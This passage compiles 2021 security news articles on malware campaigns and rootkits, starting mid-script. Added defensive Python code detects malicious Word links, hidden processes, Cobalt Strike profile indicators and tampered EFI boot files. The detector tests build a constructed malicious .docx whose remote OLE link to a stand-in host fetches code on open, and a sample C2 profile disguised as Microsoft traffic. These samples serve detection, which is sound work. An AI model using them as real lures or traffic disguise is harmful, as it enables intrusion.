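def build_sample_docx(malicious: bool = True) -> bytes:
    """Constructed minimal .docx for the demo (not a real sample)."""
    if malicious:
        rel = ('<Relationship Id="rId5" Type="%soleObject" '
               'Target="http://lure.invalid/template.doc" TargetMode="External"/>' % REL_PREFIX)
        body = ('<w:p><w:r><w:object><o:OLEObject Type="Link" ProgID="Word.Document.8" '
                'ShapeID="_x0000_i1025" DrawAspect="Content" r:id="rId5" UpdateMode="Always"/>'
                '</w:object></w:r></w:p>')
    else:   # an ordinary external hyperlink is not a finding
        rel = ('<Relationship Id="rId5" Type="%shyperlink" '
               'Target="https://example.org/" TargetMode="External"/>' % REL_PREFIX)
        body = '<w:p><w:hyperlink r:id="rId5"><w:r><w:t>link</w:t></w:r></w:hyperlink></w:p>'
    parts = {
        "[Content_Types].xml": '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>',
        "word/_rels/document.xml.rels": '<Relationships xmlns="%s">%s</Relationships>' % (NS_REL[1:-1], rel),
        "word/document.xml": (
            '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" '
            'xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" '
            'xmlns:o="urn:schemas-microsoft-com:office:office"><w:body>%s</w:body></w:document>' % body),
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, xml in parts.items():
            z.writestr(name, xml)
    return buf.getvalue()


if __name__ == "__main__":
    for f in external_links(build_sample_docx(True)):
        print("finding:", f)
    print("clean document findings:", external_links(build_sample_docx(False)))
```

Hyperlinks are external by design and are ignored; an oleObject or attachedTemplate relationship pointing at http(s) is rare in legitimate documents and, combined with UpdateMode="Always", is the signature of a document that fetches and runs code when opened.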

"The spyware can be used to steal files from the infected computer and any connected USB drives, record keystrokes, take regular screenshots of the computer, and download additional spyware components," the researchers said.

Although Innefu Labs has not been directly implicated in the incident, Amnesty International said it discovered a domain ("server.authshieldserver.com") that pointed to an IP address (122.160.158[.]3) used by the Delhi-based cybersecurity company. In a statement shared with the non-governmental organization, Innefu Labs denied any connection to the Donot Team APT, adding "they are not aware of any use of their IP address for the alleged activities."

We have reached out to the company for further comment, and we will update the story if we hear back.

"The worrying trend of private companies actively performing unlawful digital surveillance increases the scope for abuse while reducing avenues for domestic legal redress, regulation, and judicial control," Amnesty said. "The nature of cross-border commercial cyber surveillance where the surveillance targets, the operators, the end customer, and the attack infrastructure can all be located in different jurisdictions creates significant impediments to achieving remediation and redress for human rights abuses."


Researchers Warn of FontOnLake Rootkit Malware Targeting Linux Systems
9.10.21 
Virus  Thehackernews
Cybersecurity researchers have detailed a new campaign that likely targets entities in Southeast Asia with a previously unrecognized Linux malware that's engineered to enable remote access to its operators, in addition to harvesting credentials and functioning as a proxy server.

The malware family, dubbed "FontOnLake" by Slovak cybersecurity firm ESET, is said to feature "well-designed modules" that are continuously being upgraded with new features, indicating an active development phase. Samples uploaded to VirusTotal point to the possibility that the very first intrusions utilizing this threat have been happening as early as May 2020.

Avast and Lacework Labs are tracking the same malware under the moniker HCRootkit.

"The sneaky nature of FontOnLake's tools in combination with advanced design and low prevalence suggest that they are used in targeted attacks," ESET researcher Vladislav Hrčka said. "To collect data or conduct other malicious activity, this malware family uses modified legitimate binaries that are adjusted to load further components. In fact, to conceal its existence, FontOnLake's presence is always accompanied by a rootkit. These binaries are commonly used on Linux systems and can additionally serve as a persistence mechanism."

FontOnLake's toolset includes three components that consist of trojanized versions of legitimate Linux utilities that are used to load kernel-mode rootkits and user-mode backdoors, all of which communicate with one another using virtual files. The C++-based implants themselves are designed to monitor systems, secretly execute commands on networks, and exfiltrate account credentials.

A second permutation of the backdoor also comes with capabilities to act as a proxy, manipulate files, download arbitrary files, while a third variant, besides incorporating features from the other two backdoors, is equipped to execute Python scripts and shell commands.

ESET said it found two different versions of the Linux rootkit, both based on the open-source Suterusu project and overlapping in functionality: hiding processes, files, network connections, and the rootkit itself, carrying out file operations, and extracting and executing the user-mode backdoor.
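A rootkit that hides processes, as the Suterusu-derived component above does, typically filters the directory listing of /proc but rarely every other path to the same task. The following Python is an added example, not ESET's tooling: it compares the /proc listing against a signal-0 probe and a stat() of /proc/<pid> (the same cross-view idea as the unhide tool's "proc" and "brute" tests), excludes thread IDs (kill(tid, 0) succeeds for them, which otherwise makes every multithreaded process a false positive), and re-checks candidates so processes that started between views are not reported. find_hidden_pids is the pure comparison, testable with constructed sets; scan() runs the views on a live Linux host.

```python
"""Cross-view detection of processes hidden from /proc by a Linux rootkit.

Added example, not ESET's code. Run as root for complete results; as an
unprivileged user EPERM still proves existence and is treated as alive.
"""
import os


def find_hidden_pids(listed, probed, thread_ids=()):
    """PIDs alive by probe but absent from the listing, minus thread IDs."""
    return sorted(set(probed) - set(listed) - set(thread_ids))


def list_proc_pids(proc="/proc"):
    return {int(n) for n in os.listdir(proc) if n.isdigit()}


def list_thread_ids(listed, proc="/proc"):
    """Non-leader thread IDs never appear as top-level /proc entries, so collect them."""
    tids = set()
    for pid in listed:
        try:
            tids.update(int(t) for t in os.listdir(f"{proc}/{pid}/task") if t.isdigit())
        except OSError:          # process exited between the two reads
            pass
    return tids


def _alive(pid):
    try:
        os.kill(pid, 0)
        return True
    except PermissionError:      # exists, owned by someone else
        return True
    except ProcessLookupError:
        return False


def probe_pids(pid_max, proc="/proc"):
    """Second and third views: kill(pid, 0) and stat() of /proc/<pid> for every possible PID."""
    alive = set()
    for pid in range(1, pid_max + 1):
        if _alive(pid):
            alive.add(pid)
            continue
        try:
            os.stat(f"{proc}/{pid}")   # readdir may hide the entry while the path still resolves
            alive.add(pid)
        except OSError:
            pass
    return alive


def scan(proc="/proc", pid_max=None):
    """Run the views in order and confirm candidates against a fresh listing."""
    if pid_max is None:
        with open(f"{proc}/sys/kernel/pid_max") as f:
            pid_max = int(f.read())
    listed = list_proc_pids(proc)
    candidates = find_hidden_pids(listed, probe_pids(pid_max, proc), list_thread_ids(listed, proc))
    fresh = list_proc_pids(proc)
    fresh_tids = list_thread_ids(fresh, proc)
    return [p for p in candidates if p not in fresh and p not in fresh_tids and _alive(p)]


if __name__ == "__main__":
    hidden = scan()
    print("hidden PIDs:", hidden or "none")
```

With a default pid_max of 4194304 the probe loop is a few million syscalls, which takes a while; pass a smaller pid_max for a quick check. A PID reported here is not proof of a rootkit on its own (PID namespaces and exotic LSM policies can also make views disagree), but on a plain host it is exactly the discrepancy a process-hiding hook leaves behind.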

It's currently not known how the attackers gain initial access to the network, but the cybersecurity company noted that the threat actor behind the attacks is "overly cautious" to avoid leaving any tracks by relying on different, unique command-and-control (C2) servers with varying non-standard ports. All the C2 servers observed in the VirusTotal artifacts are no longer active.

"Their scale and advanced design suggest that the authors are well versed in cybersecurity and that these tools might be reused in future campaigns," Hrčka said. "As most of the features are designed just to hide its presence, relay communication, and provide backdoor access, we believe that these tools are used mostly to maintain an infrastructure which serves some other, unknown, malicious purposes."


Researchers Discover UEFI Bootkit Targeting Windows Computers Since 2012
9.10.21 
Virus  Thehackernews
Cybersecurity researchers on Tuesday revealed details of a previously undocumented UEFI (Unified Extensible Firmware Interface) bootkit that has been put to use by threat actors to backdoor Windows systems as early as 2012 by modifying a legitimate Windows Boot Manager binary to achieve persistence, once again demonstrating how technology meant to secure the environment prior to loading the operating system is increasingly becoming a "tempting target."

Slovak cybersecurity firm ESET codenamed the new malware "ESPecter" for its ability to persist on the EFI System Partition (ESP), in addition to circumventing Microsoft Windows Driver Signature Enforcement to load its own unsigned driver that can be used to facilitate espionage activities such as document theft, keylogging, and screen monitoring by periodically capturing screenshots. The intrusion route of the malware remains unknown as yet.

"ESPecter shows that threat actors are relying not only on UEFI firmware implants when it comes to pre-OS persistence and, despite the existing security mechanisms like UEFI Secure Boot, invest their time into creating malware that would be easily blocked by such mechanisms, if enabled and configured correctly," ESET researchers Martin Smolár and Anton Cherepanov said in a technical write-up published Tuesday.

ESPecter's roots can be traced back to at least 2012, originating as a bootkit for systems with legacy BIOSes, with its authors continuously adding support for new Windows OS versions while barely making any changes to the malware's modules. The biggest change arrived in 2020 when "those behind ESPecter apparently decided to move their malware from legacy BIOS systems to modern UEFI systems."

The development marks the fourth time real-world cases of UEFI malware have been discovered so far, following LoJax, MosaicRegressor, and most recently FinFisher, the last of which was found leveraging the same method of compromise to persist on the ESP in the form of a patched Windows Boot Manager.

"By patching the Windows Boot Manager, attackers achieve execution in the early stages of the system boot process, before the operating system is fully loaded," the researchers said. "This allows ESPecter to bypass Windows Driver Signature Enforcement (DSE) in order to execute its own unsigned driver at system startup."

On systems booting in Legacy BIOS mode, by contrast, ESPecter gains persistence by altering the master boot record (MBR) code in the first physical sector of the disk to interfere with the loading of the boot manager and load the malicious kernel driver, which in turn loads additional user-mode payloads and sets up the keylogger, before erasing its own traces from the machine.

Regardless of the MBR or UEFI variant used, the deployment of the driver leads to the injection of next-stage user-mode components into specific system processes to establish communications with a remote server, thereby enabling an attacker to commandeer the compromised machine and take over control, not to mention download and execute more malware or commands fetched from the server.

ESET did not attribute the bootkit to a particular nation-state or hacking group, but the use of Chinese debug messages in the user-mode client payload has raised the possibility that it could be the work of an unknown Chinese-speaking threat actor.

"Even though Secure Boot stands in the way of executing untrusted UEFI binaries from the ESP, over the last few years we have been witness to various UEFI firmware vulnerabilities affecting thousands of devices that allow disabling or bypassing Secure Boot," the researchers noted. "This shows that securing UEFI firmware is a challenging task and that the way various vendors apply security policies and use UEFI services is not always ideal."


New Study Links Seemingly Disparate Malware Attacks to Chinese Hackers
9.10.21 
Virus   Thehackernews
Chinese cyber espionage group APT41 has been linked to seemingly disparate malware campaigns, according to fresh research that has mapped together additional parts of the group's network infrastructure to hit upon a state-sponsored campaign that takes advantage of COVID-themed phishing lures to target victims in India.

"The image we uncovered was that of a state-sponsored campaign that plays on people's hopes for a swift end to the pandemic as a lure to entrap its victims," the BlackBerry Research and Intelligence team said in a report shared with The Hacker News. "And once on a user's machine, the threat blends into the digital woodwork by using its own customized profile to hide its network traffic."

APT41 (aka Barium or Winnti) is a moniker assigned to a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in conjunction with financially motivated operations for personal gain as far back as 2012. Calling the group "Double Dragon" for its twin objectives, Mandiant (formerly FireEye) pointed out the collective's penchant for striking healthcare, high-tech, and telecommunications sectors for establishing long-term access and facilitating the theft of intellectual property.

In addition, the group is known for staging cybercrime intrusions that are aimed at stealing source code and digital certificates, virtual currency manipulation, and deploying ransomware, as well as executing software supply chain compromises by injecting malicious code into legitimate files prior to distribution of software updates.

The latest research by BlackBerry builds on previous findings by Mandiant in March 2020, which detailed a "global intrusion campaign" unleashed by APT41 by exploiting a number of publicly known vulnerabilities affecting Cisco and Citrix devices to drop and execute next-stage payloads that were subsequently used to download a Cobalt Strike Beacon loader on compromised systems. The loader was notable for its use of a malleable command-and-control (C2) profile that allowed the Beacon to blend its network communications with a remote server into legitimate traffic originating from the victim network.

BlackBerry, which found a similar C2 profile uploaded to GitHub on March 29 by a Chinese security researcher using the pseudonym "1135," used the profile's metadata configuration to identify a fresh cluster of APT41-related domains that attempt to make Beacon traffic look like legitimate traffic to Microsoft sites, with IP address and domain name overlaps found in campaigns linked to the Higaisa APT group and to Winnti disclosed over the past year.
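The reason a recovered malleable C2 profile is so useful to defenders is that it fixes the URIs, Host headers and User-Agent a Beacon will use, which is exactly what the paragraphs above describe BlackBerry pivoting on. The following Python is an added example, not BlackBerry's code: a small parser for Cobalt Strike's profile syntax that extracts those indicators and checks an observed HTTP request against them. The profile it parses is a constructed stand-in, not the one found on GitHub.

```python
"""Extract network indicators from a Cobalt Strike malleable C2 profile.

Added example, not BlackBerry's code. SAMPLE_PROFILE is constructed for
the demo, not a recovered APT41 profile.
"""


def tokenize(text):
    """'{', '}', ';', ('str', s) for quoted strings, ('word', w) for everything else."""
    tokens, i, n = [], 0, len(text)
    while i < n:
        c = text[i]
        if c.isspace():
            i += 1
        elif c == "#":                                   # comment to end of line
            i = text.find("\n", i) % (n + 1)             # -1 (no newline) becomes n
        elif c in "{};":
            tokens.append(c)
            i += 1
        elif c == '"':
            j = text.index('"', i + 1)
            tokens.append(("str", text[i + 1:j]))
            i = j + 1
        else:
            j = i
            while j < n and not text[j].isspace() and text[j] not in '{};"#':
                j += 1
            tokens.append(("word", text[i:j]))
            i = j
    return tokens


def parse(tokens):
    """Nested list of ('stmt', tokens) and ('block', header_tokens, children)."""
    pos = 0

    def block():
        nonlocal pos
        items, cur = [], []
        while pos < len(tokens):
            t = tokens[pos]
            pos += 1
            if t == ";":
                items.append(("stmt", cur))
                cur = []
            elif t == "{":
                items.append(("block", cur, block()))
                cur = []
            elif t == "}":
                break
            else:
                cur.append(t)
        return items

    return block()


def extract_indicators(profile_text):
    ind = {"uris": set(), "hosts": set(), "user_agents": set(), "settings": {}}

    def walk(items, path):
        for item in items:
            if item[0] == "block":
                name = " ".join(v for k, v in item[1] if k == "word")   # ignores variant names
                walk(item[2], path + [name])
            else:
                toks = item[1]
                if len(toks) >= 3 and toks[0] == ("word", "set"):
                    key, val = toks[1][1], toks[2][1]
                    ind["settings"]["/".join(path + [key])] = val
                    if key.startswith("uri") and path and path[-1].startswith("http-"):
                        ind["uris"].update(val.split())   # "set uri" may list several, space-separated
                    elif key == "useragent":
                        ind["user_agents"].add(val)
                elif len(toks) >= 3 and toks[0] == ("word", "header") and toks[1][1].lower() == "host":
                    ind["hosts"].add(toks[2][1])

    walk(parse(tokenize(profile_text)), [])
    return {k: sorted(v) if isinstance(v, set) else v for k, v in ind.items()}


def match_request(ind, host, path, user_agent=""):
    """Profile-derived indicators hit by one observed HTTP request (e.g. a proxy log line)."""
    hits = [name for name, ok in (("host", host in ind["hosts"]), ("uri", path in ind["uris"]),
                                  ("user-agent", bool(user_agent) and user_agent in ind["user_agents"])) if ok]
    return hits


SAMPLE_PROFILE = '''
# constructed demo profile made to resemble Microsoft update traffic
set sleeptime "45000";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
http-get {
    set uri "/en-us/windows/update /en-us/security/patch";
    client { header "Host" "www.microsoft.example"; metadata { base64url; header "Cookie"; } }
    server { header "Server" "Microsoft-IIS/10.0"; output { base64; print; } }
}
http-post {
    set uri "/en-us/windows/report";
    client { header "Host" "www.microsoft.example"; id { parameter "id"; } output { print; } }
}
http-stager {
    set uri_x86 "/en-us/download/st86";
    set uri_x64 "/en-us/download/st64";
    client { header "Host" "cdn.microsoft.example"; }
}
'''
```

A Host header of www.microsoft.example sent to an IP that does not belong to Microsoft is the tell: the profile can make the request look right, but it cannot change where the TCP connection goes, so the strongest detection pairs these indicators with the destination address rather than matching the HTTP fields alone.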

A follow-on investigation into the URLs revealed as many as three malicious PDF files that reached out to one of the newly discovered domains that had also previously hosted a Cobalt Strike Team Server. The documents, likely used alongside phishing emails as an initial infection vector, claimed to be COVID-19 advisories issued by the government of India or to contain information regarding the latest income tax legislation targeting non-resident Indians.

The spear-phishing attachments appear in the form of .LNK files or .ZIP archives, which, when opened, result in the PDF document being displayed to the victim, while, in the background, the infection chain leads to the execution of a Cobalt Strike Beacon. Although a set of intrusions using similar phishing lures and uncovered in September 2020 were pinned on the Evilnum group, BlackBerry said the compromise indicators point to an APT41-affiliated campaign.

"With the resources of a nation-state level threat group, it's possible to create a truly staggering level of diversity in their infrastructure," the researchers said, adding by piecing together the malicious activities of the threat actor via public sharing of information, it's possible to "uncover the tracks that the cybercriminals involved worked so hard to hide."


Chinese Hackers Used a New Rootkit to Spy on Targeted Windows 10 Users
6.10.21 
Virus   Thehackernews
A formerly unknown Chinese-speaking threat actor has been linked to a long-standing evasive operation aimed at South East Asian targets as far back as July 2020 to deploy a kernel-mode rootkit on compromised Windows systems.

Attacks mounted by the hacking group, dubbed GhostEmperor by Kaspersky, are also said to have used a "sophisticated multi-stage malware framework" that allows for providing persistence and remote control over the targeted hosts.

The Russian cybersecurity firm called the rootkit Demodex, with infections reported across several high-profile entities in Malaysia, Thailand, Vietnam, and Indonesia, in addition to outliers located in Egypt, Ethiopia, and Afghanistan.

"[Demodex] is used to hide the user mode malware's artefacts from investigators and security solutions, while demonstrating an interesting undocumented loading scheme involving the kernel mode component of an open-source project named Cheat Engine to bypass the Windows Driver Signature Enforcement mechanism," Kaspersky researchers said.

GhostEmperor infections have been found to leverage multiple intrusion routes that culminate in the execution of malware in memory, chief among them being exploiting known vulnerabilities in public-facing servers such as Apache, Windows IIS, Oracle, and Microsoft Exchange — including the ProxyLogon exploits that came to light in March 2021 — to gain an initial foothold and laterally pivot to other parts of the victim's network, even on machines running recent versions of the Windows 10 operating system.

Following a successful breach, select infection chains that resulted in the deployment of the rootkit were carried out remotely via another system in the same network using legitimate software such as WMI or PsExec, leading to the execution of an in-memory implant capable of installing additional payloads during run time.

Notwithstanding its reliance on obfuscation and other detection-evasion methods to elude discovery and analysis, Demodex gets around Microsoft's Driver Signature Enforcement mechanism to permit the execution of unsigned, arbitrary code in kernel space by leveraging a legitimate and open-source signed driver named "dbk64.sys" that's shipped alongside Cheat Engine, an application used to introduce cheats into video games.

"With a long-standing operation, high profile victims, [and] advanced toolset […] the underlying actor is highly skilled and accomplished in their craft, both of which are evident through the use of a broad set of unusual and sophisticated anti-forensic and anti-analysis techniques," the researchers said.

The disclosure comes as a China-linked threat actor codenamed TAG-28 has been discovered as being behind intrusions against Indian media and government agencies such as The Times Group, the Unique Identification Authority of India (UIDAI), and the police department of the state of Madhya Pradesh.

Recorded Future, earlier this week, also unearthed malicious activity targeting a mail server of Roshan, one of Afghanistan's largest telecommunications providers, that it attributed to four distinct Chinese state-sponsored actors — RedFoxtrot, Calypso APT, as well as two separate clusters using backdoors associated with the Winnti and PlugX groups.


Beware of Fake Amnesty International Antivirus for Pegasus that Hacks PCs with Malware
6.10.21 
Virus  Thehackernews

In yet another indicator of how hacking groups are quick to capitalize on world events and improvise their attack campaigns for maximum impact, threat actors have been discovered impersonating Amnesty International to distribute malware that purports to be security software designed to safeguard against NSO Group's Pegasus surveillanceware.

"Adversaries have set up a phony website that looks like Amnesty International's — a human rights-focused non-governmental organization — and points to a promised antivirus tool to protect against the NSO Group's Pegasus tool," Cisco Talos researchers said. "However, the download actually installs the little-known Sarwent malware."

The countries most affected by the campaign include the U.K., the U.S., Russia, India, Ukraine, Czech Republic, Romania, and Colombia. While it's unclear as to how the victims are lured into visiting the fake Amnesty International website, the cybersecurity firm surmised the attacks could be aimed at users who may be specifically searching for protection against this threat.

The development comes on the heels of an explosive investigation in July 2021 that revealed widespread abuse of the Israeli company's Pegasus "military-grade spyware" to facilitate human rights violations by surveilling heads of state, activists, journalists, and lawyers around the world. The NGO has since also released a Mobile Verification Toolkit (MVT) to help individuals scan their iPhone and Android devices for evidence of compromise.

Besides the social engineering of a rogue website with the identical look and feel of Amnesty International's legitimate portal, the lure tricks the visitor into downloading "Amnesty Anti Pegasus Software," a supposed antivirus tool that in fact gives the attacker remote access to the compromised machine and exfiltrates sensitive information, such as login credentials.

The Sarwent sample used in the low-volume campaign is a highly-customized variant coded in Delphi and is capable of allowing remote desktop access through VNC or RDP and executing command line or PowerShell instructions received from an attacker-controlled domain, the results of which are sent back to the server.

Talos attributed the infections with high confidence to a Russian-speaking actor located in Russia and known for mounting attacks involving the Sarwent backdoor since at least January 2021 across a variety of victims, noting the extent of the modifications made to the supposed antivirus as likely evidence that "the operator has access to the source code of the Sarwent malware."

"The campaign targets people who might be concerned that they are targeted by the Pegasus spyware," the researchers said. "This targeting raises issues of possible state involvement, but there is insufficient information […] to make any determination on which state or nation. It is possible that this is simply a financially motivated actor looking to leverage headlines to gain new access."


New Tomiris Backdoor Found Linked to Hackers Behind SolarWinds Cyberattack
6.10.21 
Virus  Thehackernews
Cybersecurity researchers on Wednesday disclosed a previously undocumented backdoor likely designed and developed by the Nobelium advanced persistent threat (APT) behind last year's SolarWinds supply chain attack, joining the threat actor's ever-expanding arsenal of hacking tools.

Moscow-headquartered firm Kaspersky codenamed the malware "Tomiris," calling out its similarities to SUNSHUTTLE (aka GoldMax), a second-stage malware used during the campaign against the IT management software provider's Orion platform. Nobelium is also known by the monikers UNC2452, SolarStorm, StellarParticle, Dark Halo, and Iron Ritual.

"While supply-chain attacks were already a documented attack vector leveraged by a number of APT actors, this specific campaign stood out due to the extreme carefulness of the attackers and the high-profile nature of their victims," Kaspersky researchers said. "Evidence gathered so far indicates that Dark Halo spent six months inside Orion IT's networks to perfect their attack and make sure that their tampering of the build chain wouldn't cause any adverse effects."

Microsoft, which detailed SUNSHUTTLE in March 2021, described the strain as a Golang-based malware that acts as a command-and-control backdoor, establishing a secure connection with an attacker-controlled server to fetch and execute arbitrary commands on the compromised machine as well as exfiltrate files from the system to the server.

The new Tomiris backdoor, found by Kaspersky in June this year from samples dating back to February, is also written in Go and deployed via a successful DNS hijacking attack during which targets attempting to access the login page of a corporate email service were redirected to a fraudulent domain set up with a lookalike interface designed to trick the visitors into downloading the malware under the guise of a security update.

The attacks are believed to have been mounted against several government organizations in an unnamed CIS member state.

"The main purpose of the backdoor was to establish a foothold in the attacked system and to download other malicious components," the researchers said, in addition to finding a number of similarities ranging from the encryption scheme to the same spelling mistakes that collectively hint at the "possibility of common authorship or shared development practices."

This is not the first time overlaps have been discovered between different tools put to use by the threat actor. Earlier this year, Kaspersky's analysis of Sunburst revealed a number of shared features between the malware and Kazuar, a .NET-based backdoor attributed to the Turla group. Interestingly, the cybersecurity company said it detected Tomiris in networks where other machines were infected with Kazuar, adding weight to prospects that the three malware families could be linked to each other.

Having said that, the researchers pointed out it could also be a case of a false flag attack, wherein threat actors deliberately reproduce the tactics and techniques adopted by a known adversary in an attempt to mislead attribution.

The revelation comes days after Microsoft took the wraps off a passive and highly targeted implant dubbed FoggyWeb that was employed by the Nobelium group to deliver additional payloads and steal sensitive information from Active Directory Federation Services (AD FS) servers.


New FinSpy Malware Variant Infects Windows Systems With UEFI Bootkit
6.10.21 
Virus  Thehackernews
Commercially developed FinFisher surveillanceware has been upgraded to infect Windows devices using a UEFI (Unified Extensible Firmware Interface) bootkit that leverages a trojanized Windows Boot Manager, marking a shift in infection vectors that allow it to elude discovery and analysis.

Detected in the wild since 2011, FinFisher (aka FinSpy or Wingbird) is a spyware toolset for Windows, macOS, and Linux developed by Anglo-German firm Gamma International and supplied exclusively to law enforcement and intelligence agencies. But as with NSO Group's Pegasus, the software has allegedly also been used to spy on Bahraini activists in the past and was delivered as part of spear-phishing campaigns in September 2017.

FinFisher is equipped to harvest user credentials, file listings, sensitive documents, record keystrokes, siphon email messages from Thunderbird, Outlook, Apple Mail, and Icedove, intercept Skype contacts, chats, calls and transferred files, and capture audio and video by gaining access to a machine's microphone and webcam.

While the tool was previously deployed through tampered installers of legitimate applications such as TeamViewer, VLC, and WinRAR that were backdoored with an obfuscated downloader, subsequent updates in 2014 enabled infections via Master Boot Record (MBR) bootkits with the goal of injecting a malicious loader in a manner that's engineered to slip past security tools.

The latest addition is the ability to deploy a UEFI bootkit to load FinSpy: new samples replace the Windows UEFI boot loader (the Windows Boot Manager on the EFI System Partition) with a malicious variant, and ship with four layers of obfuscation and other detection-evasion methods to slow down reverse engineering and analysis.

"This way of infection allowed the attackers to install a bootkit without the need to bypass firmware security checks," Kaspersky's Global Research and Analysis Team (GReAT) said in a technical deep dive following an eight-month-long investigation. "UEFI infections are very rare and generally hard to execute, they stand out due to their evasiveness and persistence."

UEFI is a firmware interface that succeeds the legacy basic input/output system (BIOS) and adds Secure Boot, which checks the signatures of boot components before running them so that unsigned or tampered code cannot take over the boot process. Because UEFI code runs before the operating system itself, bootkit infections are inconspicuous to security solutions running within the operating system. An implant in the firmware itself also survives OS reinstallation and even replacement of the hard drive; a bootkit stored on the EFI System Partition, as in this case, lives on the disk and is wiped along with it, and may be overwritten when an installer rewrites the boot files.

This enables threat actors to have control over the boot process, achieve persistence, and bypass all security defences. "While in this case the attackers did not infect the UEFI firmware itself, but its next boot stage, the attack was particularly stealthy, as the malicious module was installed on a separate partition and could control the boot process of the infected machine," the researchers added.
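Both the ESPecter write-up earlier on this page and the FinSpy analysis above describe the same move: replacing or patching the Windows Boot Manager on the ESP. A cheap first-pass check a responder can run on a mounted ESP is whether each .efi file under EFI\Microsoft\Boot still carries an Authenticode certificate table (PE data directory 4) and whether its hash is one you have allowlisted from a known-good build. The following Python is an added example, not ESET's or Kaspersky's code. It does not verify the signature cryptographically (a patched file can keep a table whose signature no longer matches; use signtool or Get-AuthenticodeSignature for that), so an unknown hash is a prompt for full verification, not a verdict. The sample images are constructed in memory.

```python
"""Authenticode certificate table and hash check for boot binaries on the ESP.

Added example, not ESET's or Kaspersky's code. Detects a stripped certificate
table and unallowlisted hashes; it does not validate the signature itself.
"""
import hashlib
import os
import struct

IMAGE_SUBSYSTEM_EFI_APPLICATION = 10
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def pe_signature_info(data: bytes) -> dict:
    """Parse just enough of the PE headers to locate the certificate table."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine = struct.unpack_from("<H", data, e_lfanew + 4)[0]
    opt = e_lfanew + 24                       # optional header follows the 20-byte COFF header
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                        # PE32+
        fmt, n_off, dir_off = "PE32+", 108, 112
    elif magic == 0x10B:                      # PE32
        fmt, n_off, dir_off = "PE32", 92, 96
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    n_dirs = struct.unpack_from("<I", data, opt + n_off)[0]
    cert_off = cert_size = 0
    if n_dirs > 4:                            # IMAGE_DIRECTORY_ENTRY_SECURITY is index 4
        cert_off, cert_size = struct.unpack_from("<II", data, opt + dir_off + 4 * 8)
    info = {"format": fmt, "machine": machine, "subsystem": subsystem,
            "cert_offset": cert_off, "cert_size": cert_size, "has_authenticode": False}
    # Unlike other directories, the security entry holds a raw file offset, not an RVA.
    if cert_off and cert_size >= 8 and cert_off + 8 <= len(data):
        length, _rev, ctype = struct.unpack_from("<IHH", data, cert_off)
        info["has_authenticode"] = (ctype == WIN_CERT_TYPE_PKCS_SIGNED_DATA
                                    and 8 < length <= cert_size and cert_off + length <= len(data))
    return info


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def check_boot_binary(data: bytes, known_good_sha256: set) -> str:
    """Verdict for a file found under EFI\\Microsoft\\Boot on the ESP."""
    info = pe_signature_info(data)
    if info["subsystem"] != IMAGE_SUBSYSTEM_EFI_APPLICATION:
        return "not-an-efi-application"
    if not info["has_authenticode"]:
        return "unsigned"                     # Secure Boot would refuse this outright if enabled
    if sha256_hex(data) not in known_good_sha256:
        return "unknown-hash"                 # looks signed but is not a build you trust: verify fully
    return "ok"


def scan_esp(mount_point: str, known_good_sha256: set) -> dict:
    """check_boot_binary for every .efi under the Microsoft boot directory of a mounted ESP."""
    results = {}
    for root, _dirs, files in os.walk(os.path.join(mount_point, "EFI", "Microsoft", "Boot")):
        for name in files:
            if name.lower().endswith(".efi"):
                path = os.path.join(root, name)
                with open(path, "rb") as f:
                    results[path] = check_boot_binary(f.read(), known_good_sha256)
    return results


def build_sample_efi_image(signed: bool = True) -> bytes:
    """Constructed minimal PE32+ EFI application (no sections) for the demo."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    opt = bytearray(240)                                           # PE32+ header with 16 directories
    struct.pack_into("<H", opt, 0, 0x20B)
    struct.pack_into("<H", opt, 68, IMAGE_SUBSYSTEM_EFI_APPLICATION)
    struct.pack_into("<I", opt, 108, 16)
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, len(opt), 0x0022)
    header_len = len(dos) + 4 + len(coff) + len(opt)
    cert = b""
    if signed:
        blob = b"\x30\x82" + b"\0" * 62                            # stands in for a PKCS#7 SignedData blob
        cert = struct.pack("<IHH", 8 + len(blob), 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + blob
        cert += b"\0" * (-len(cert) % 8)
        struct.pack_into("<II", opt, 112 + 4 * 8, header_len, len(cert))
    return dos + b"PE\0\0" + coff + bytes(opt) + cert
```

On Windows the ESP is mounted with mountvol S: /S (an elevated prompt) and the allowlist is built from the bootmgfw.efi of a trusted installation medium; on a Linux forensic workstation the partition mounts like any FAT volume. Note that on a Secure Boot system an "unsigned" result on bootmgfw.efi implies either that Secure Boot is off or that the firmware was persuaded to accept it, and both are findings in their own right.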


New BloodyStealer Trojan Steals Gamers' Epic Games and Steam Accounts
6.10.21 
Virus  Thehackernews
A new advanced trojan sold on Russian-speaking underground forums comes with capabilities to steal users' accounts on popular online video game distribution services, including Steam, Epic Games Store, and EA Origin, underscoring a growing threat to the lucrative gaming market.

Cybersecurity firm Kaspersky, which coined the name "BloodyStealer," said it first detected the malicious tool in March 2021 being advertised for sale at an attractive price of 700 RUB (less than $10) for one month or $40 for a lifetime subscription. Attacks using BloodyStealer have been uncovered so far in Europe, Latin America, and the Asia-Pacific region.

"BloodyStealer is a Trojan-stealer capable of gathering and exfiltrating various types of data, for cookies, passwords, forms, banking cards from browsers, screenshots, log-in memory, and sessions from various applications," the company said. The information harvested from gaming apps, such as Bethesda, Epic Games, GOG, Origin, Steam, and VimeWorld, is exfiltrated to a remote server, from where it's likely to be monetized on darknet platforms or Telegram channels that are dedicated to selling access to online gaming accounts.

